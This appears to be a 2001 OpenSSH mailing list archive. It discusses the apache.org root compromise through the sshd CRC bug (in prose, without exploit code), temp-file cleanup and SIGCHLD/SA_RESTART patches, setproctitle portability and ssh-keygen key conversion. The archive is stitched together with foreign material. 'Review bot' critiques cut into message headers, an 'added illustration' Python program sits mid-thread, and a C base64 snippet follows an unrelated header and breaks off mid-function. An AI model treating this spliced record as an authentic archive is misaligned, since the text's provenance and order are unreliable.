Message-ID: <20010605092224.4096.qmail@web11201.mail.yahoo.com>

>> No, I don't think so. AFAIK that bug was fixed in 2.1.1, and apache.org
>> reportedly ran "OpenSSH 2.2".
>
>apache.org never had an insecure ssh, someone knew a password for an
>account and used that. Wichert.

Not if their issued statement reflects what actually happened:

"The ssh client at SourceForge had been compromised to log outgoing names and passwords, so the cracker was thus able to get a shell on apache.org. After unsuccessfully attempting to get elevated privileges using an old installation of Bugzilla on apache.org, [- here comes the important bit -] the cracker used a weakness in the ssh daemon (OpenSSH 2.2) to gain root privileges."

I.e. they only used an account to get local (non-root) access. The point here was that after they had local access they rooted the box using "a weakness" in the ssh server. I'm assuming this weakness is the CRC attack detector bug mentioned previously in this thread.

The released exploit requires a lot of constants to be correct, and finding them requires you to have more than half a clue and some time to spare. If the sshd binary was readable, or came from a known distribution, it would be quite feasible to find the constants required. Bruteforcing some of the constants is also quite fast with local access, and due to the nature of the bug the server crashes before any logging takes place (unless sshd was configured to log more than normal).

nuuB

__________________________________________________
Do You Yahoo!?
Get personalized email addresses from Yahoo! Mail - only $35 a year!
http://personal.mail.yahoo.com/

From Markus.Friedl at informatik.uni-erlangen.de Tue Jun 5 19:30:46 2001
From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl)
Date: Tue, 5 Jun 2001 11:30:46 +0200
Subject: Recent breakins / SSHD root hole?
In-Reply-To: <20010605092224.4096.qmail@web11201.mail.yahoo.com>; from _nuub@yahoo.com on Tue, Jun 05, 2001 at 02:22:24AM -0700
References: <20010605092224.4096.qmail@web11201.mail.yahoo.com>
Message-ID: <20010605113045.C15889@faui02.informatik.uni-erlangen.de>

> the cracker used
> a weakness in the ssh daemon (OpenSSH 2.2) to gain root privileges."

we've been talking to some apache developers, and they said that it is likely that the attacker gained root access by exploiting the crc/malloc(0) bug in their old OpenSSH 2.2 daemon. this bug has been mentioned earlier; many SSH v1 implementations suffer from the same bug. the bug has been fixed in OpenSSH 2.3.1.

From gert at greenie.muc.de Tue Jun 5 21:46:58 2001
From: gert at greenie.muc.de (Gert Doering)
Date: Tue, 5 Jun 2001 13:46:58 +0200
Subject: authorized_keys2 directory idea
In-Reply-To: <20010605002150.B22495@cygbert.vinschen.de>; from Corinna Vinschen on Tue, Jun 05, 2001 at 12:21:50AM +0200
References: <200106042140.f54LewV25801@cvs.openbsd.org> <20010605002150.B22495@cygbert.vinschen.de>
Message-ID: <20010605134658.E22510@greenie.muc.de>

Hi,

On Tue, Jun 05, 2001 at 12:21:50AM +0200, Corinna Vinschen wrote:
> On Mon, Jun 04, 2001 at 03:40:58PM -0600, Theo de Raadt wrote:
> > If any of you put in 1% of the work Markus has put in, we would listen to
> > you.
> >
> > Am I being harsh?
> >
> > Yes. Am I being realistic? Yes.
>
> Just the same as in many projects. Many demands, no help.

While I originally wanted to stay out of this discussion, I just want to point out that many of the people actually discussing here *have* contributed - by testing "foreign" architectures and providing patches (or at least input), or by offering patches that haven't been included.

So that's not really fair. The help *is* there, but it is rejected (in case of the features being discussed).

gert

-- 
USENET is *not* the non-clickable part of WWW!
                                                           //www.muc.de/~gert/
Gert Doering - Munich, Germany                             gert at greenie.muc.de
fax: +49-89-35655025                        gert.doering at physik.tu-muenchen.de

From raj at cerias.purdue.edu Tue Jun 5 23:21:09 2001
From: raj at cerias.purdue.edu (Brian Poole)
Date: Tue, 5 Jun 2001 08:21:09 -0500
Subject: Handling of password & account expirations
In-Reply-To: ; from stevesk@pobox.com on Mon, Jun 04, 2001 at 08:32:19PM -0700
References: <20010604153741.B4977@basm.cerias.purdue.edu>
Message-ID: <20010605082109.C4977@basm.cerias.purdue.edu>

Quoting Kevin Steves (stevesk at pobox.com) from 4 June 2001:
> a portable BSD auth would be interesting, particularly if it shrinks the
> diff with openbsd openssh. i don't see why we can't do this.

I can't see a reason besides the time factor; it just requires someone to actually write it.

> yes it is an issue, but i think the answer may be a portable BSD auth.

I can deal with that. I'm just glad that others agree that there is an issue and it is something that should be dealt with. So what is next? Who codes this portable BSD auth? I'm interested in BSD auth but haven't found a ton of information on it (besides the man pages, which just give function information).

-b

From Markus.Friedl at informatik.uni-erlangen.de Wed Jun 6 00:54:04 2001
From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Tue, 5 Jun 2001 16:54:04 +0200 Subject: OpenSSH tmp cleanup In-Reply-To: <20010605092146.A39858@messi.uku.fi>; from Jarno.Huuskonen@uku.fi on Tue, Jun 05, 2001 at 09:21:46AM +0300 References: <20010605092146.A39858@messi.uku.fi> Message-ID: <20010605165404.A13522@faui02.informatik.uni-erlangen.de> On Tue, Jun 05, 2001 at 09:21:46AM +0300, Jarno Huuskonen wrote: > I noticed that Markus has fixed the temporary file cleanup problems in > OpenSSH cvs. What files need patching for this ? I only noticed > changes in: session.c, channels.h and channels.c. yes. i tried to port this back to 2.9, but i don't have time for testing etc. simple fix is s/cookies/x11_forwarding_with_openssh_is_fun/ in session.c correct fix looks like: Index: channels.c =================================================================== RCS file: /home/markus/cvs/ssh/channels.c,v retrieving revision 1.109 diff -u -r1.109 channels.c --- channels.c 2001/04/17 12:55:03 1.109 +++ channels.c 2001/06/05 14:38:42 @@ -2524,10 +2524,17 @@ /* removes the agent forwarding socket */ void -cleanup_socket(void) +auth_sock_cleanup_proc(void *_pw) { - unlink(channel_forwarded_auth_socket_name); - rmdir(channel_forwarded_auth_socket_dir); + struct passwd *pw = _pw; + + if (channel_forwarded_auth_socket_name) { + temporarily_use_uid(pw); + unlink(channel_forwarded_auth_socket_name); + rmdir(channel_forwarded_auth_socket_dir); + channel_forwarded_auth_socket_name = NULL; + restore_uid(); + } } /* 
@@ -2566,11 +2573,9 @@ snprintf(channel_forwarded_auth_socket_name, MAX_SOCKET_NAME, "%s/agent.%d", channel_forwarded_auth_socket_dir, (int) getpid()); - if (atexit(cleanup_socket) < 0) { - int saved = errno; - cleanup_socket(); - packet_disconnect("socket: %.100s", strerror(saved)); - } + /* delete agent socket on fatal() */ + fatal_add_cleanup(auth_sock_cleanup_proc, pw); + /* Create the socket. */ sock = socket(AF_UNIX, SOCK_STREAM, 0); if (sock < 0) Index: channels.h =================================================================== RCS file: /home/markus/cvs/ssh/channels.h,v retrieving revision 1.31 diff -u -r1.31 channels.h --- channels.h 2001/04/13 22:46:53 1.31 +++ channels.h 2001/06/05 14:37:23 @@ -293,6 +293,8 @@ */ char *auth_get_socket_name(void); +void auth_sock_cleanup_proc(void *_pw); + /* * This is called to process SSH_CMSG_AGENT_REQUEST_FORWARDING on the server. * This starts forwarding authentication requests. Index: session.c =================================================================== RCS file: /home/markus/cvs/ssh/session.c,v retrieving revision 1.74 diff -u -r1.74 session.c --- session.c 2001/04/17 19:34:25 1.74 +++ session.c 2001/06/05 14:39:54 @@ -89,12 +89,15 @@ void session_set_fds(Session *s, int fdin, int fdout, int fderr); void session_pty_cleanup(Session *s); void session_proctitle(Session *s); +int session_setup_x11fwd(Session *s); +void session_close(Session *s); void do_exec_pty(Session *s, const char *command); void do_exec_no_pty(Session *s, const char *command); void do_login(Session *s, const char *command); void do_child(Session *s, const char *command); void do_motd(void); int check_quietlogin(Session *s, const char *command); +void xauthfile_cleanup_proc(void *pw); void do_authenticated1(Authctxt *authctxt); void do_authenticated2(Authctxt *authctxt); 
@@ -154,18 +157,26 @@ do_authenticated2(authctxt); else do_authenticated1(authctxt); + + /* remote user's local Xauthority file and agent socket */ + if (xauthfile) + xauthfile_cleanup_proc(authctxt->pw); + if (auth_get_socket_name()) + auth_sock_cleanup_proc(authctxt->pw); } /* * Remove local Xauthority file. */ void -xauthfile_cleanup_proc(void *ignore) +xauthfile_cleanup_proc(void *_pw) { - debug("xauthfile_cleanup_proc called"); + struct passwd *pw = _pw; + char *p; + debug("xauthfile_cleanup_proc called"); if (xauthfile != NULL) { - char *p; + temporarily_use_uid(pw); unlink(xauthfile); p = strrchr(xauthfile, '/'); if (p != NULL) { @@ -174,6 +185,7 @@ } xfree(xauthfile); xauthfile = NULL; + restore_uid(); } } @@ -209,7 +221,7 @@ { Session *s; char *command; - int success, type, fd, n_bytes, plen, screen_flag, have_pty = 0; + int success, type, n_bytes, plen, screen_flag, have_pty = 0; int compression_level = 0, enable_compression_after_reply = 0; u_int proto_len, data_len, dlen; @@ -290,22 +302,6 @@ break; case SSH_CMSG_X11_REQUEST_FORWARDING: - if (!options.x11_forwarding) { - packet_send_debug("X11 forwarding disabled in server configuration file."); - break; - } - if (!options.xauth_location) { - packet_send_debug("No xauth program; cannot forward with spoofing."); - break; - } - if (no_x11_forwarding_flag) { - packet_send_debug("X11 forwarding not permitted for this authentication."); - break; - } - debug("Received request for X11 forwarding with auth spoofing."); - if (s->display != NULL) - packet_disconnect("Protocol error: X11 display already set."); - s->auth_proto = packet_get_string(&proto_len); s->auth_data = packet_get_string(&data_len); 
@@ -325,31 +321,11 @@ 4 + proto_len + 4 + data_len, type); s->screen = 0; } - s->display = x11_create_display_inet(s->screen, options.x11_display_offset); - - if (s->display == NULL) - break; - - /* Setup to always have a local .Xauthority. */ - xauthfile = xmalloc(MAXPATHLEN); - strlcpy(xauthfile, "/tmp/ssh-XXXXXXXX", MAXPATHLEN); - temporarily_use_uid(s->pw); - if (mkdtemp(xauthfile) == NULL) { - restore_uid(); - error("private X11 dir: mkdtemp %s failed: %s", - xauthfile, strerror(errno)); - xfree(xauthfile); - xauthfile = NULL; - /* XXXX remove listening channels */ - break; + success = session_setup_x11fwd(s); + if (!success) { + xfree(s->auth_proto); + xfree(s->auth_data); } - strlcat(xauthfile, "/cookies", MAXPATHLEN); - fd = open(xauthfile, O_RDWR|O_CREAT|O_EXCL, 0600); - if (fd >= 0) - close(fd); - restore_uid(); - fatal_add_cleanup(xauthfile_cleanup_proc, NULL); - success = 1; break; case SSH_CMSG_AGENT_REQUEST_FORWARDING: @@ -402,9 +378,7 @@ if (command != NULL) xfree(command); - /* Cleanup user's local Xauthority file. */ - if (xauthfile) - xauthfile_cleanup_proc(NULL); + session_close(s); return; default: @@ -1372,23 +1346,7 @@ int session_x11_req(Session *s) { - int fd; - if (no_x11_forwarding_flag) { - debug("X11 forwarding disabled in user configuration file."); - return 0; - } - if (!options.x11_forwarding) { - debug("X11 forwarding disabled in server configuration file."); - return 0; - } - if (xauthfile != NULL) { - debug("X11 fwd already started."); - return 0; - } - - debug("Received request for X11 forwarding with auth spoofing."); - if (s->display != NULL) - packet_disconnect("Protocol error: X11 display already set."); + int success; s->single_connection = packet_get_char(); s->auth_proto = packet_get_string(NULL); 
@@ -1396,33 +1354,12 @@ s->screen = packet_get_int(); packet_done(); - s->display = x11_create_display_inet(s->screen, options.x11_display_offset); - if (s->display == NULL) { + success = session_setup_x11fwd(s); + if (!success) { xfree(s->auth_proto); xfree(s->auth_data); - return 0; } - xauthfile = xmalloc(MAXPATHLEN); - strlcpy(xauthfile, "/tmp/ssh-XXXXXXXX", MAXPATHLEN); - temporarily_use_uid(s->pw); - if (mkdtemp(xauthfile) == NULL) { - restore_uid(); - error("private X11 dir: mkdtemp %s failed: %s", - xauthfile, strerror(errno)); - xfree(xauthfile); - xauthfile = NULL; - xfree(s->auth_proto); - xfree(s->auth_data); - /* XXXX remove listening channels */ - return 0; - } - strlcat(xauthfile, "/cookies", MAXPATHLEN); - fd = open(xauthfile, O_RDWR|O_CREAT|O_EXCL, 0600); - if (fd >= 0) - close(fd); - restore_uid(); - fatal_add_cleanup(xauthfile_cleanup_proc, s); - return 1; + return success; } int @@ -1636,6 +1573,10 @@ void session_close(Session *s) { + if (s->display) { + xauthfile_cleanup_proc(s->pw); + fatal_remove_cleanup(xauthfile_cleanup_proc, s->pw); + } session_pty_cleanup(s); session_free(s); session_proctitle(s); 
@@ -1710,11 +1651,57 @@ setproctitle("%s@%s", s->pw->pw_name, session_tty_list()); } +int +session_setup_x11fwd(Session *s) +{ + int fd; + struct stat st; + + if (no_x11_forwarding_flag) { + packet_send_debug("X11 forwarding disabled in user configuration file."); + return 0; + } + if (!options.x11_forwarding) { + debug("X11 forwarding disabled in server configuration file."); + return 0; + } + if (!options.xauth_location || + (stat(options.xauth_location, &st) == -1)) { + packet_send_debug("No xauth program; cannot forward with spoofing."); + return 0; + } + if (s->display != NULL) { + debug("X11 display already set."); + return 0; + } + xauthfile = xmalloc(MAXPATHLEN); + strlcpy(xauthfile, "/tmp/ssh-XXXXXXXX", MAXPATHLEN); + temporarily_use_uid(s->pw); + if (mkdtemp(xauthfile) == NULL) { + restore_uid(); + error("private X11 dir: mkdtemp %s failed: %s", + xauthfile, strerror(errno)); + xfree(xauthfile); + xauthfile = NULL; + return 0; + } + strlcat(xauthfile, "/cookies", MAXPATHLEN); + fd = open(xauthfile, O_RDWR|O_CREAT|O_EXCL, 0600); + if (fd >= 0) + close(fd); + restore_uid(); + s->display = x11_create_display_inet(s->screen, options.x11_display_offset); + if (s->display == NULL) { + xauthfile_cleanup_proc(s->pw); + return 0; + } + fatal_add_cleanup(xauthfile_cleanup_proc, s->pw); + return 1; +} + void do_authenticated2(Authctxt *authctxt) { server_loop2(); - if (xauthfile) - xauthfile_cleanup_proc(NULL); } From Darren.Moffat at eng.sun.com Wed Jun 6 06:25:47 2001 
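Review bot: in the first channels.c hunk, auth_sock_cleanup_proc() clears channel_forwarded_auth_socket_name after the unlink()/rmdir() but leaves channel_forwarded_auth_socket_dir pointing at the removed directory; the NULL guard on the name is what makes a repeated call harmless, so set the dir pointer to NULL in the same block for symmetry, and update the comment above the function ("removes the agent forwarding socket") to say it now also switches to the user's uid via temporarily_use_uid()/restore_uid().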
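Review bot: in the second channels.c hunk, replacing `atexit(cleanup_socket)` with `fatal_add_cleanup(auth_sock_cleanup_proc, pw)` means the agent socket is no longer removed on a plain exit() path; the explicit `auth_sock_cleanup_proc(authctxt->pw)` added at the end of do_authenticated() in session.c covers the normal return, but nothing calls fatal_remove_cleanup() afterwards, unlike the xauthfile handling in session_close(). Either add `fatal_remove_cleanup(auth_sock_cleanup_proc, authctxt->pw)` after that explicit call or state in the code that the second run on fatal() is intentionally a no-op.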
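Review bot: the new prototype in channels.h, `void auth_sock_cleanup_proc(void *_pw);`, has no comment although every neighbouring declaration carries one; a line saying that `_pw` is a `struct passwd *` and that the function may be called more than once would spare readers a trip to channels.c. Likewise the session.c prototype `void xauthfile_cleanup_proc(void *pw);` names the parameter `pw` while the definition uses `_pw`; keep them identical.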
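Review bot: xauthfile_cleanup_proc() now dereferences its argument through temporarily_use_uid(pw), whereas the old signature `(void *ignore)` accepted NULL; all callers in this diff are updated to pass `s->pw` or `authctxt->pw`, but any caller outside the diff that still passes NULL (the removed `fatal_add_cleanup(xauthfile_cleanup_proc, NULL)` shows the old convention) would crash, so call this contract change out in the commit message.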
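Review bot: folding both X11 request paths into session_setup_x11fwd() changes behaviour when a display is already set: the removed code in do_authenticated1() and session_x11_req() called `packet_disconnect("Protocol error: X11 display already set.")`, while the new function only logs `debug("X11 display already set.")` and returns 0, so a repeated X11 forwarding request is now tolerated instead of ending the connection. If that relaxation is intended, document it. In the same function the diagnostics are inconsistent: the user-config and missing-xauth refusals use packet_send_debug() (sent to the client) but the server-config and display-already-set cases use debug() only, whereas the old do_authenticated1() code sent all of them to the client.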
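Review bot: in session_setup_x11fwd() the result of `fd = open(xauthfile, O_RDWR|O_CREAT|O_EXCL, 0600)` is only closed when it is >= 0; if open() fails the error is ignored and forwarding continues without the cookie file, so treat `fd < 0` like the mkdtemp() failure (log, run xauthfile_cleanup_proc(s->pw), return 0). On the positive side, creating the Xauthority directory before x11_create_display_inet() and cleaning it up when the display cannot be created resolves the old `/* XXXX remove listening channels */` leak, which is worth noting in the commit message.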
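Review bot: in the protocol-1 SSH_CMSG_EXEC path, `session_close(s)` replaces the two-line xauthfile cleanup; per the @@ -1636 hunk, session_close() also runs session_pty_cleanup(), session_free() and session_proctitle(), so confirm none of these were already performed later on that path (a second session_free() would be a use-after-free), and note that the `if (s->display)` guard in session_close() relies on xauthfile being NULL whenever s->display is NULL, which session_setup_x11fwd() now guarantees by cleaning up on display failure.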
From: Darren.Moffat at eng.sun.com (Darren Moffat)
Date: Tue, 5 Jun 2001 13:25:47 -0700 (PDT)
Subject: setproctitle
Message-ID: <200106052027.f55KRKQ931331@jurassic.eng.sun.com>

The portable OpenSSH source comes with an implementation of setproctitle() that on some systems (Solaris for example) does nothing. The current sendmail distributions have an alternate setproctitle() that tries to get the effect on a wide range of systems.

Would there be any interest in a patch for the portable OpenSSH that uses the sendmail setproctitle as a starting point to get setproctitle functionality on more systems?

Note I haven't done the work yet, but wanted to know if there was interest first.

-- 
Darren J Moffat

From abush at microcenter.com Wed Jun 6 07:30:45 2001
From: abush at microcenter.com (Aaron Bush)
Date: Tue, 05 Jun 2001 17:30:45 -0400
Subject: HPUX: ssh hangs after shell exit
Message-ID: <3B1D4F85.FEF10A43@mail.microcenter.com>

I am aware that there have been several posts related to ssh connections hanging; i have tried to read through most of them in the archives... I am posting this in hopes that it may present something new that will further help resolve this problem.

The problem i am having appears to be similar to what others have reported, where after typing exit in an interactive shell the connection is not closed until an additional _one_ key stroke is issued (space-bar, enter, etc...).

The sshd server is OpenSSH_2.9p1 on HPUX-11.00. I have tried connecting using the OpenSSH_2.9p1 ssh client from Linux-2.4, HPUX-11.00 and FreeBSD-4.2. The behavior so far is _always_ consistent:

1) establish connection to sshd using ssh simply via "ssh remote-host"
2) type exit in interactive shell on remote-host.
3) "logout" is echoed to the terminal and the local shell prompt is NOT echoed.
4) type any other key, usually i just hit the space-bar. <<--PROBLEM IS HERE
5) "Connection to remote-host closed." is echoed to the terminal followed by the local shell prompt.

If i do a ps from another session on the remote-host (HPUX-11.00) before doing step 4 from above (hitting space-bar) this is what i see (cleaned up to remove non-related processes):
----
sysadm$ ps -ef|grep abush
     UID   PID  PPID  C    STIME TTY       TIME COMMAND
    root 20088 15876  0 17:49:31 ?         0:00 sshd: abush at 4
   abush 20090 20088  0 17:49:32 ?         0:00
----

An additional problem that appears to be related to this (but does not happen 100% of the time) is that a scp of a file from a HPUX-11.00 sshd server will hang indefinitely. Looking at the same ps output will show the same process again.
----

The problem is only seen when the sshd server is running on HPUX; connections between other hosts respond as expected.
I can also provide output from sshd -d and ssh -v -v -v if needed, and anything else that might help to clear this up.

Thanks,
-ab

From mouring at etoh.eviladmin.org Wed Jun 6 08:06:28 2001
From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org)
Date: Tue, 5 Jun 2001 17:06:28 -0500 (CDT)
Subject: setproctitle
In-Reply-To: <200106052027.f55KRKQ931331@jurassic.eng.sun.com>

It has been talked about in the past, but no one has gone out of their way to actually do the work. It would be nice if setproctitle() worked on the majority of the platforms instead of on just one or two. Just for some of us.. it's well.=) Not been a high priority item.

I'm willing to accept a patch to fix this.

- Ben

On Tue, 5 Jun 2001, Darren Moffat wrote:

> The portable OpenSSH source comes with an implementation of
> setproctitle() that on some systems (Solaris for example) does nothing.
> The current sendmail distributions have an alternate setproctitle()
> that tries to get the effect on a wide range of systems.
>
> Would there be any interest in a patch for the portable OpenSSH that
> uses the sendmail setproctitle as a starting point to get setproctitle
> functionality on more systems ?
>
> Note I haven't done the work yet, but wanted to know if there was
> interest first.
>
> --
> Darren J Moffat
>
>

From stevesk at pobox.com Wed Jun 6 08:46:57 2001
From: stevesk at pobox.com (Kevin Steves)
Date: Tue, 5 Jun 2001 15:46:57 -0700 (PDT)
Subject: setproctitle
In-Reply-To: <200106052027.f55KRKQ931331@jurassic.eng.sun.com>

On Tue, 5 Jun 2001, Darren Moffat wrote:
:The portable OpenSSH source comes with an implementation of
:setproctitle() that on some systems (Solaris for example) does nothing.
:The current sendmail distributions have an alternate setproctitle()
:that tries to get the effect on a wide range of systems.

it only works on hp-ux right now, which uses pstat(2) for the command string. i looked at sendmail's code before deciding it was cleaner and easier to start with openbsd setproctitle.c and add title methods as needed and as they were understood. and i don't know what issues there might be with sendmail's license.

From stevesk at pobox.com Wed Jun 6 09:03:24 2001
From: stevesk at pobox.com (Kevin Steves)
Date: Tue, 5 Jun 2001 16:03:24 -0700 (PDT)
Subject: HPUX: ssh hangs after shell exit
In-Reply-To: <3B1D4F85.FEF10A43@mail.microcenter.com>

On Tue, 5 Jun 2001, Aaron Bush wrote:
:The problem i am having appears to be similar to what others have
:reported where after typing exit in an interactive shell the connection
:is not closed until an additional _one_ key stroke is issued (space-bar,
:enter, etc...).
:
:The sshd server is OpenSSH_2.9p1 on HPUX-11.00. I have tried connecting
:using the OpenSSH_2.9p1 ssh client from Linux-2.4, HPUX-11.00 and
:FreeBSD-4.2. The behavior so far is _always_ consistent:
:
:1) establish connection to sshd using ssh simply via "ssh remote-host"
:2) type exit in interactive shell on remote-host.
:3) "logout" is echoed to the terminal and the local shell prompt is NOT
:echoed.
:4) type any other key, usually i just hit the space-bar. <<--PROBLEM IS
:HERE
:5) "Connection to remote-host closed." is echoed to the terminal
:followed by the local shell prompt.

can you try the patch at the end? hp-ux (and possibly the other systems you mentioned) restarts select() when SA_RESTART is set, which we were setting for SIGCHLD, and we should not have select() restarted. i would also be interested in someone with Unixware trying this so we can further verify issues with grantpt(), which is why we added the restart code in the first place.

:If i do a ps from another session on the remote-host (HPUX-11.00) before
:doing step 4 from above (hitting space-bar) this is what i see
:(cleaned up to remove non-related processes):
:----
:sysadm$ ps -ef|grep abush
:     UID   PID  PPID  C    STIME TTY       TIME COMMAND
:    root 20088 15876  0 17:49:31 ?         0:00 sshd: abush at 4
:   abush 20090 20088  0 17:49:32 ?         0:00
:
:----
:An additional problem that appears to be related to this (but does
:not happen 100% of the time) is that a scp of a file from a HPUX-11.00
:sshd server will hang indefinitely.
:Looking at the same ps output will
:show the same process again.

i'm not positive, but i think this will fix that issue as well.

:The problem is only seen when the sshd server is running on HPUX,
:connections between other hosts respond as expected.
:
:I can also provide output from sshd -d and ssh -v -v -v if needed and
:anything else that might help to clear this up.

Index: misc.c =================================================================== RCS file: /var/cvs/openssh/misc.c,v retrieving revision 1.20 diff -u -r1.20 misc.c --- misc.c 2001/05/12 00:08:38 1.20 +++ misc.c 2001/06/05 20:55:54 @@ -220,7 +220,7 @@ memset(&sa, 0, sizeof(sa)); sigemptyset(&sa.sa_mask); sa.sa_flags = 0; -#if defined(SA_RESTART) +#if 0 if (sig == SIGCHLD) sa.sa_flags |= SA_RESTART; #endif

From liblit at eecs.berkeley.edu Wed Jun 6 11:21:46 2001
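Review bot: changing the guard from `#if defined(SA_RESTART)` to `#if 0` leaves dead code in misc.c with no explanation of why it was disabled; either delete the three lines or replace the guard with a comment stating that the SIGCHLD handler must not use SA_RESTART because some platforms (HP-UX, per the message) then restart select() and the server loop never notices the child's exit. Since the message says the restart was added for grantpt() on Unixware, also record how that case is expected to behave without it.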
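An added illustration of the mechanism behind this fix (this is not code from the message or from OpenSSH; Python is used so it runs anywhere, rather than the C of sshd): the patch works because sshd's loop relies on select() returning EINTR when SIGCHLD arrives, which a platform that honours SA_RESTART for select() defeats. A loop that must not depend on that platform detail can give select() a descriptor to watch that is written the moment the signal is delivered. The function below forks a child that exits immediately and shows that select() wakes through such a wake-up pipe whether system-call restarting is on or off (toggled with siginterrupt(), which mirrors the SA_RESTART setting under discussion); the timeout, the pipe and the handler are all constructed for the example. One Python-specific caveat: the interpreter itself retries select() after EINTR, so the raw EINTR return that sshd sees is not observable here; the wake-up descriptor is what makes the child's exit visible either way.

```python
import os
import select
import signal
import time


def wait_for_child_via_select(timeout=5.0, restart_syscalls=False):
    """Fork a child that exits at once, block in select() as a server loop
    would, and report whether the child's exit woke select().

    Returns a dict: woke (True if select() returned because SIGCHLD arrived),
    elapsed (seconds spent in select()), signals (SIGCHLD count seen by the
    Python-level handler). Example code; not OpenSSH's.
    """
    seen = []

    # Wake-up pipe: the interpreter's C-level signal trampoline writes one
    # byte here the instant SIGCHLD is delivered, so the descriptor becomes
    # readable whether or not the platform restarts select() after a signal.
    r, w = os.pipe()
    os.set_blocking(w, False)
    old_wakeup = signal.set_wakeup_fd(w)
    old_handler = signal.signal(signal.SIGCHLD,
                                lambda signum, _frame: seen.append(signum))
    # restart_syscalls=True is the SA_RESTART behaviour the message describes;
    # False is what the misc.c change switches sshd to.
    signal.siginterrupt(signal.SIGCHLD, not restart_syscalls)

    try:
        pid = os.fork()
        if pid == 0:
            os._exit(0)  # child: exit immediately, raising SIGCHLD in the parent

        start = time.monotonic()
        readable, _, _ = select.select([r], [], [], timeout)
        elapsed = time.monotonic() - start

        if readable:
            os.read(r, 64)  # drain the wake-up byte(s)
        os.waitpid(pid, 0)  # reap the child so no zombie is left behind
        return {"woke": bool(readable), "elapsed": elapsed, "signals": len(seen)}
    finally:
        # Restore the process-wide signal state we changed.
        signal.siginterrupt(signal.SIGCHLD, True)
        signal.signal(signal.SIGCHLD,
                      old_handler if old_handler is not None else signal.SIG_DFL)
        signal.set_wakeup_fd(old_wakeup)
        os.close(r)
        os.close(w)


if __name__ == "__main__":
    for restart in (False, True):
        result = wait_for_child_via_select(restart_syscalls=restart)
        print(f"SA_RESTART={'on' if restart else 'off'}: woke={result['woke']} "
              f"after {result['elapsed']:.3f}s, handler saw {result['signals']} SIGCHLD")
```

The design point for a daemon: a self-pipe (or pselect() with the signal blocked outside the call) makes child-exit handling independent of whether the platform restarts select(), so a future SA_RESTART change cannot reintroduce this hang.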
From: liblit at eecs.berkeley.edu (Ben Liblit) Date: Tue, 05 Jun 2001 18:21:46 -0700 Subject: ssh-keygen key conversion questions Message-ID: <3B1D85AA.91AA2E8F@eecs.berkeley.edu> Using ssh-keygen from OpenSSH-2.9p1, I can perform the following key conversions: - convert a commercial public key into an OpenSSH public key: % ssh-keygen -i -f commercial-key.pub > openssh-key.pub - convert a commercial private key into an OpenSSH private key, provided that the commercial key has no password % ssh-keygen -i -f commercial-key > openssh-key - convert an OpenSSH public key into a commercial public key: % ssh-keygen -e -f openssh-key.pub > commercial-key.pub % ssh-keygen -e -f openssh-key > commercial-key.pub (these both do the same thing) I am left with two questions. First, the inability to convert encrypted commercial keys into similarly encrypted OpenSSH keys is unfortunate. Can anyone give me the standard story on why this doesn't work as one might hope? Is it simply a feature that is waiting to be implemented, or are there deeper intractable issues? Second, there is one conversion path missing. How does one convert an OpenSSH private key into a commercial private key? Thank you! From djm at mindrot.org Wed Jun 6 13:12:47 2001 
From: djm at mindrot.org (Damien Miller) Date: Wed, 6 Jun 2001 13:12:47 +1000 (EST) Subject: ssh-keygen key conversion questions In-Reply-To: <3B1D85AA.91AA2E8F@eecs.berkeley.edu> Message-ID: On Tue, 5 Jun 2001, Ben Liblit wrote: > I am left with two questions. First, the inability to convert > encrypted commercial keys into similarly encrypted OpenSSH keys is > unfortunate. Can anyone give me the standard story on why this > doesn't work as one might hope? Is it simply a feature that is > waiting to be implemented, or are there deeper intractable issues? > > Second, there is one conversion path missing. How does one convert an > OpenSSH private key into a commercial private key? We don't know what format ssh.com uses to store their private keys and no one has come forward to reverse engineer it. -d -- | Damien Miller \ ``E-mail attachments are the poor man's | http://www.mindrot.org / distributed filesystem'' - Dan Geer From Markus.Friedl at informatik.uni-erlangen.de Wed Jun 6 18:13:58 2001 
From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Wed, 6 Jun 2001 10:13:58 +0200 Subject: ssh-keygen key conversion questions In-Reply-To: <3B1D85AA.91AA2E8F@eecs.berkeley.edu>; from liblit@eecs.berkeley.edu on Tue, Jun 05, 2001 at 06:21:46PM -0700 References: <3B1D85AA.91AA2E8F@eecs.berkeley.edu> Message-ID: <20010606101358.C18811@faui02.informatik.uni-erlangen.de> On Tue, Jun 05, 2001 at 06:21:46PM -0700, Ben Liblit wrote: > Using ssh-keygen from OpenSSH-2.9p1, I can perform the following key > conversions: > > - convert a commercial public key into an OpenSSH public key: > > % ssh-keygen -i -f commercial-key.pub > openssh-key.pub > > - convert a commercial private key into an OpenSSH private key, > provided that the commercial key has no password > > % ssh-keygen -i -f commercial-key > openssh-key > > - convert an OpenSSH public key into a commercial public key: > > % ssh-keygen -e -f openssh-key.pub > commercial-key.pub > % ssh-keygen -e -f openssh-key > commercial-key.pub > > (these both do the same thing) > > I am left with two questions. First, the inability to convert > encrypted commercial keys into similarly encrypted OpenSSH keys is > unfortunate. Can anyone give me the standard story on why this > doesn't work as one might hope? show us patches :) i have no idea how they encrypt the key. however, you can still decrypt the key using the commercial software. > Is it simply a feature that is > waiting to be implemented, or are there deeper intractable issues? i won't implement this. > Second, there is one conversion path missing. How does one convert an > OpenSSH private key into a commercial private key? no documentation, no code. i think openssh's keygen has all features needed for migrating to openssh. -m From c.bailiff at devsecure.com Wed Jun 6 18:38:01 2001 
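For the public-key direction the conversion is only a reformatting job, which is why both `-e` invocations above produce the same output. The following is an added example, not ssh-keygen's code, and assumes that the "commercial" public key file is the SECSH public key file format that `ssh-keygen -i`/`-e` handle (the `---- BEGIN SSH2 PUBLIC KEY ----` envelope, today RFC 4716). It turns such a file into OpenSSH's one-line form; the key type is recovered from the length-prefixed string at the start of the base64 blob, which both formats share. The embedded key file is constructed for the example and its blob is not a real key.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* A SECSH-format public key file, constructed for this example. The base64 blob
 * is NOT a real key; only its first bytes (uint32 length 7 + "ssh-rsa") matter. */
const char *const SAMPLE_SECSH_KEY =
    "---- BEGIN SSH2 PUBLIC KEY ----\n"
    "Comment: \"test key\"\n"
    "AAAAB3NzaC1yc2EAAAADAQABAAAAQQC0example\n"
    "BLOBexample==\n"
    "---- END SSH2 PUBLIC KEY ----\n";

/* Decode base64 into out (at most outlen bytes); returns bytes written, -1 on a bad character. */
static int b64_decode(const char *in, size_t inlen, unsigned char *out, size_t outlen)
{
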